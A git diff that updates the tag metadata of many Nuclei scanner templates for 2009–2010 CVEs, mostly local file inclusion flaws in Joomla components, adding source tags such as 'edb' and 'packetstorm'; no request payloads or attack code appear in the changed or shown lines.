raw: diff --git a/config/nuclei-templates/cves/2009/CVE-2009-1496.yaml b/config/nuclei-templates/cves/2009/CVE-2009-1496.yaml index aa1ad36f1..66d11ba7e 100644 --- a/config/nuclei-templates/cves/2009/CVE-2009-1496.yaml +++ b/config/nuclei-templates/cves/2009/CVE-2009-1496.yaml @@ -15,7 +15,7 @@ info: cvss-score: 8.6 cve-id: CVE-2009-1496 cwe-id: CWE-22 - tags: cve,cve2009,joomla,lfi + tags: joomla,lfi,edb,cve,cve2009 requests: - method: GET diff --git a/config/nuclei-templates/cves/2009/CVE-2009-1558.yaml b/config/nuclei-templates/cves/2009/CVE-2009-1558.yaml index 8ebdf5675..455bf0359 100644 --- a/config/nuclei-templates/cves/2009/CVE-2009-1558.yaml +++ b/config/nuclei-templates/cves/2009/CVE-2009-1558.yaml @@ -16,7 +16,7 @@ info: cvss-score: 8.6 cve-id: CVE-2009-1558 cwe-id: CWE-22 - tags: cve,cve2009,iot,lfi,linksys,camera,cisco,firmware,traversal + tags: cve,iot,linksys,camera,traversal,cve2009,lfi,cisco,firmware,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2009/CVE-2009-1872.yaml b/config/nuclei-templates/cves/2009/CVE-2009-1872.yaml index 0eb674597..bdc9a7e4f 100644 --- a/config/nuclei-templates/cves/2009/CVE-2009-1872.yaml +++ b/config/nuclei-templates/cves/2009/CVE-2009-1872.yaml @@ -16,7 +16,7 @@ info: metadata: shodan-query: http.component:"Adobe ColdFusion" verified: "true" - tags: cve,cve2009,adobe,xss,coldfusion + tags: cve,cve2009,adobe,xss,coldfusion,tenable requests: - method: GET diff --git a/config/nuclei-templates/cves/2009/CVE-2009-2015.yaml b/config/nuclei-templates/cves/2009/CVE-2009-2015.yaml index 1b8aaff16..a474ff1b2 100644 --- a/config/nuclei-templates/cves/2009/CVE-2009-2015.yaml +++ b/config/nuclei-templates/cves/2009/CVE-2009-2015.yaml @@ -16,7 +16,7 @@ info: cvss-score: 8.6 cve-id: CVE-2009-2015 cwe-id: CWE-22 - tags: cve,cve2009,joomla,lfi + tags: joomla,lfi,edb,cve,cve2009 requests: - method: GET diff --git a/config/nuclei-templates/cves/2009/CVE-2009-2100.yaml b/config/nuclei-templates/cves/2009/CVE-2009-2100.yaml index 17c3fc5ae..10d0f5904 100644 --- a/config/nuclei-templates/cves/2009/CVE-2009-2100.yaml +++ b/config/nuclei-templates/cves/2009/CVE-2009-2100.yaml @@ -16,7 +16,7 @@ info: cvss-score: 8.6 cve-id: CVE-2009-2100 cwe-id: CWE-22 - tags: cve,cve2009,joomla,lfi + tags: cve,cve2009,joomla,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2009/CVE-2009-3053.yaml b/config/nuclei-templates/cves/2009/CVE-2009-3053.yaml index 0071b01e3..2a5e91b46 100644 --- a/config/nuclei-templates/cves/2009/CVE-2009-3053.yaml +++ b/config/nuclei-templates/cves/2009/CVE-2009-3053.yaml @@ -16,7 +16,7 @@ info: cvss-score: 8.6 cve-id: CVE-2009-3053 cwe-id: CWE-22 - tags: cve,cve2009,joomla,lfi + tags: cve,cve2009,joomla,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2009/CVE-2009-3318.yaml b/config/nuclei-templates/cves/2009/CVE-2009-3318.yaml index 979374f6a..fe8a9f699 100644 --- a/config/nuclei-templates/cves/2009/CVE-2009-3318.yaml +++ b/config/nuclei-templates/cves/2009/CVE-2009-3318.yaml @@ -12,7 +12,7 @@ info: - https://web.archive.org/web/20210121192413/https://www.securityfocus.com/bid/36441/ classification: cve-id: CVE-2009-3318 - tags: cve,cve2009,joomla,lfi + tags: joomla,lfi,edb,cve,cve2009 requests: - method: GET diff --git a/config/nuclei-templates/cves/2009/CVE-2009-4202.yaml b/config/nuclei-templates/cves/2009/CVE-2009-4202.yaml index 1dc7847bd..72d2b72fa 100644 --- a/config/nuclei-templates/cves/2009/CVE-2009-4202.yaml +++ b/config/nuclei-templates/cves/2009/CVE-2009-4202.yaml @@ -12,7 +12,7 @@ info: - http://web.archive.org/web/20210121191031/https://www.securityfocus.com/bid/35201/ classification: cve-id: CVE-2009-4202 - tags: cve,cve2009,joomla,lfi,photo + tags: cve2009,joomla,lfi,photo,edb,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2009/CVE-2009-4223.yaml b/config/nuclei-templates/cves/2009/CVE-2009-4223.yaml index 3cee0503c..6c15468fe 100644 --- a/config/nuclei-templates/cves/2009/CVE-2009-4223.yaml +++ b/config/nuclei-templates/cves/2009/CVE-2009-4223.yaml @@ -13,7 +13,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2009-4223 classification: cve-id: CVE-2009-4223 - tags: cve,cve2009,krweb,rfi + tags: cve,cve2009,krweb,rfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2009/CVE-2009-4679.yaml b/config/nuclei-templates/cves/2009/CVE-2009-4679.yaml index 8551ad287..5b3eddb5f 100644 --- a/config/nuclei-templates/cves/2009/CVE-2009-4679.yaml +++ b/config/nuclei-templates/cves/2009/CVE-2009-4679.yaml @@ -13,7 +13,7 @@ info: - http://web.archive.org/web/20140722130146/http://secunia.com/advisories/37760/ classification: cve-id: CVE-2009-4679 - tags: cve,cve2009,joomla,lfi,nexus + tags: cve,cve2009,joomla,lfi,nexus,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2009/CVE-2009-5114.yaml b/config/nuclei-templates/cves/2009/CVE-2009-5114.yaml index 6f4163420..5af5b4b50 100644 --- a/config/nuclei-templates/cves/2009/CVE-2009-5114.yaml +++ b/config/nuclei-templates/cves/2009/CVE-2009-5114.yaml @@ -13,7 +13,7 @@ info: remediation: Apply all relevant security patches and product upgrades. classification: cve-id: CVE-2009-5114 - tags: cve,cve2009,lfi + tags: edb,cve,cve2009,lfi requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-0157.yaml b/config/nuclei-templates/cves/2010/CVE-2010-0157.yaml index 5efc8acf3..da7e3a7f6 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-0157.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-0157.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-0157 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2010,joomla,lfi,edb,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-0467.yaml b/config/nuclei-templates/cves/2010/CVE-2010-0467.yaml index 54024e92d..3fe291128 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-0467.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-0467.yaml @@ -16,7 +16,7 @@ info: cvss-score: 5.8 cve-id: CVE-2010-0467 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2010,joomla,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-0696.yaml b/config/nuclei-templates/cves/2010/CVE-2010-0696.yaml index 92582e721..13c6825f6 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-0696.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-0696.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-0696 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2010,joomla,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-0759.yaml b/config/nuclei-templates/cves/2010/CVE-2010-0759.yaml index a67d691d7..06f7036b6 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-0759.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-0759.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-0759 - tags: cve,cve2010,joomla,lfi,plugin + tags: cve,cve2010,joomla,lfi,plugin,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-0942.yaml b/config/nuclei-templates/cves/2010/CVE-2010-0942.yaml index cfbd90f03..7da6f78f2 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-0942.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-0942.yaml @@ -12,7 +12,7 @@ info: remediation: Apply all relevant security patches and product upgrades. classification: cve-id: CVE-2010-0942 - tags: cve,cve2010,joomla,lfi + tags: cve2010,joomla,lfi,edb,packetstorm,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-0943.yaml b/config/nuclei-templates/cves/2010/CVE-2010-0943.yaml index bceb45f80..7e876effe 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-0943.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-0943.yaml @@ -12,7 +12,7 @@ info: - http://web.archive.org/web/20140724215426/http://secunia.com/advisories/33486/ classification: cve-id: CVE-2010-0943 - tags: cve,cve2010,joomla,lfi + tags: cve2010,joomla,lfi,edb,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-0944.yaml b/config/nuclei-templates/cves/2010/CVE-2010-0944.yaml index e3e41de5b..f4466848f 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-0944.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-0944.yaml @@ -13,7 +13,7 @@ info: remediation: Apply all relevant security patches and product upgrades. classification: cve-id: CVE-2010-0944 - tags: cve,cve2010,joomla,lfi + tags: cve2010,joomla,lfi,edb,packetstorm,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-0972.yaml b/config/nuclei-templates/cves/2010/CVE-2010-0972.yaml index 8f2d7a597..8407ae95f 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-0972.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-0972.yaml @@ -13,7 +13,7 @@ info: remediation: Apply all relevant security patches and product upgrades. classification: cve-id: CVE-2010-0972 - tags: cve,cve2010,joomla,lfi + tags: edb,cve,cve2010,joomla,lfi requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-0982.yaml b/config/nuclei-templates/cves/2010/CVE-2010-0982.yaml index 6115f7db0..d01504ad8 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-0982.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-0982.yaml @@ -13,7 +13,7 @@ info: remediation: Apply all relevant security patches and product upgrades. classification: cve-id: CVE-2010-0982 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2010,joomla,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-0985.yaml b/config/nuclei-templates/cves/2010/CVE-2010-0985.yaml index a76686d1d..bf22a5fe1 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-0985.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-0985.yaml @@ -13,7 +13,7 @@ info: remediation: Apply all relevant security patches and product upgrades. classification: cve-id: CVE-2010-0985 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2010,joomla,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1056.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1056.yaml index 9beb13943..e7acf71db 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1056.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1056.yaml @@ -13,7 +13,7 @@ info: remediation: Apply all relevant security patches and product upgrades. classification: cve-id: CVE-2010-1056 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2010,joomla,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1081.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1081.yaml index 7ab93f609..846d1ba7c 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1081.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1081.yaml @@ -12,7 +12,7 @@ info: remediation: Apply all relevant security patches and product upgrades. classification: cve-id: CVE-2010-1081 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2010,joomla,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1217.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1217.yaml index 641c05d51..71b5ad9a3 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1217.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1217.yaml @@ -13,7 +13,7 @@ info: remediation: Apply all relevant security patches and product upgrades. classification: cve-id: CVE-2010-1217 - tags: cve,cve2010,joomla,lfi,plugin + tags: edb,packetstorm,cve,cve2010,joomla,lfi,plugin requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1219.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1219.yaml index b77cb9031..7fc13086f 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1219.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1219.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-1219 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2010,joomla,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1302.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1302.yaml index 3cde2090b..1f25c7cec 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1302.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1302.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-1302 - tags: cve,cve2010,joomla,lfi,graph + tags: edb,cve,cve2010,joomla,lfi,graph requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1304.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1304.yaml index 8acfe14a7..c2e0e955f 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1304.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1304.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-1304 - tags: cve,cve2010,joomla,lfi,status + tags: cve2010,joomla,lfi,status,edb,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1305.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1305.yaml index e8f445299..4250249b6 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1305.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1305.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-1305 - tags: cve,cve2010,joomla,lfi + tags: joomla,lfi,edb,cve,cve2010 requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1306.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1306.yaml index b7dab2c96..26928f9d4 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1306.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1306.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-1306 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2010,joomla,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1307.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1307.yaml index 87c3d8751..cf39fdc2b 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1307.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1307.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-1307 - tags: cve,cve2010,joomla,lfi + tags: edb,cve,cve2010,joomla,lfi requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1308.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1308.yaml index f9f2d8466..909c451b5 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1308.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1308.yaml @@ -12,7 +12,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-1308 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2010,joomla,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1312.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1312.yaml index f401522b7..059b64aa7 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1312.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1312.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-1312 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2010,joomla,lfi,edb,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1313.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1313.yaml index 5abb270f0..c0d27ee8d 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1313.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1313.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-1313 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2010,joomla,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1314.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1314.yaml index ab236e0ec..3958192d9 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1314.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1314.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-1314 - tags: cve,cve2010,joomla,lfi + tags: lfi,edb,packetstorm,cve,cve2010,joomla requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1315.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1315.yaml index 9f4125113..de359df4a 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1315.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1315.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-1315 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2010,joomla,lfi,edb,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1340.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1340.yaml index 66aca5018..e97e61294 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1340.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1340.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-1340 - tags: cve,cve2010,joomla,lfi + tags: cve2010,joomla,lfi,edb,packetstorm,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1345.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1345.yaml index d97a1f819..fa6ee67ce 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1345.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1345.yaml @@ -12,7 +12,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-1345 - tags: cve,cve2010,joomla,lfi + tags: lfi,edb,cve,cve2010,joomla requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1352.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1352.yaml index fadd93add..af0680717 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1352.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1352.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-1352 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2010,joomla,lfi,edb,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1353.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1353.yaml index 7fd60df5d..73fb8f002 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1353.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1353.yaml @@ -12,7 +12,7 @@ info: - http://www.vupen.com/english/advisories/2010/0808 classification: cve-id: CVE-2010-1353 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2010,joomla,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1354.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1354.yaml index 9fa622187..aeef17296 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1354.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1354.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-1354 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2010,joomla,lfi,edb,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1461.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1461.yaml index f0acfccda..0c6bf1782 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1461.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1461.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-1461 - tags: cve,cve2010,joomla,lfi,photo + tags: cve,cve2010,joomla,lfi,photo,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1469.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1469.yaml index b8370e009..be491b5e7 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1469.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1469.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-1469 - tags: cve,cve2010,joomla,lfi + tags: lfi,edb,packetstorm,cve,cve2010,joomla requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1470.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1470.yaml index f5117822e..1d6450b1b 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1470.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1470.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-1470 - tags: cve,cve2010,joomla,lfi + tags: cve2010,joomla,lfi,edb,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1471.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1471.yaml index 7234a2446..0d9df245c 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1471.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1471.yaml @@ -11,7 +11,7 @@ info: - http://www.vupen.com/english/advisories/2010/0862 classification: cve-id: CVE-2010-1471 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2010,joomla,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1472.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1472.yaml index 66851c44e..a69ad8730 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1472.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1472.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-1472 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2010,joomla,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1473.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1473.yaml index 9401200e0..7d81133c2 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1473.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1473.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-1473 - tags: cve,cve2010,joomla,lfi + tags: joomla,lfi,edb,packetstorm,cve,cve2010 requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1474.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1474.yaml index 1302e6b6d..ebce5060f 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1474.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1474.yaml @@ -12,7 +12,7 @@ info: - http://www.exploit-db.com/exploits/12182 classification: cve-id: CVE-2010-1474 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2010,joomla,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1475.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1475.yaml index 7530d3853..9d5ab4433 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1475.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1475.yaml @@ -12,7 +12,7 @@ info: - http://www.exploit-db.com/exploits/12147 classification: cve-id: CVE-2010-1475 - tags: cve,cve2010,joomla,lfi + tags: edb,cve,cve2010,joomla,lfi requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1476.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1476.yaml index 156adbb01..1ae3498a3 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1476.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1476.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-1476 - tags: cve,cve2010,joomla,lfi + tags: joomla,lfi,edb,packetstorm,cve,cve2010 requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1478.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1478.yaml index 1b074314b..1d8de5316 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1478.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1478.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-1478 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2010,joomla,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1491.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1491.yaml index 25b76d1d6..3640e1e37 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1491.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1491.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-1491 - tags: cve,cve2010,joomla,lfi + tags: cve2010,joomla,lfi,edb,packetstorm,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1494.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1494.yaml index 3a962ee05..d8a96ed10 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1494.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1494.yaml @@ -12,7 +12,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-1494 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2010,joomla,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1495.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1495.yaml index d94775f64..6e28f8a4f 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1495.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1495.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-1495 - tags: cve,cve2010,joomla,lfi + tags: cve2010,joomla,lfi,edb,packetstorm,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1531.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1531.yaml index 5186a8ad9..6a0cba1da 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1531.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1531.yaml @@ -12,7 +12,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-1531 - tags: cve,cve2010,joomla,lfi + tags: lfi,edb,packetstorm,cve,cve2010,joomla requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1532.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1532.yaml index 79bd64b71..3cfdb1c33 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1532.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1532.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-1532 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2010,joomla,lfi,edb,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1533.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1533.yaml index 969f544ee..50a833080 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1533.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1533.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-1533 - tags: cve,cve2010,joomla,lfi + tags: cve2010,joomla,lfi,edb,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1534.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1534.yaml index 0fdd87b42..a7222cf33 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1534.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1534.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version classification: cve-id: CVE-2010-1534 - tags: cve,cve2010,joomla,lfi + tags: joomla,lfi,edb,cve,cve2010 requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1535.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1535.yaml index 4bfbde361..dd182e49a 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1535.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1535.yaml @@ -12,7 +12,7 @@ info: - http://www.exploit-db.com/exploits/12151 classification: cve-id: CVE-2010-1535 - tags: cve,cve2010,joomla,lfi + tags: 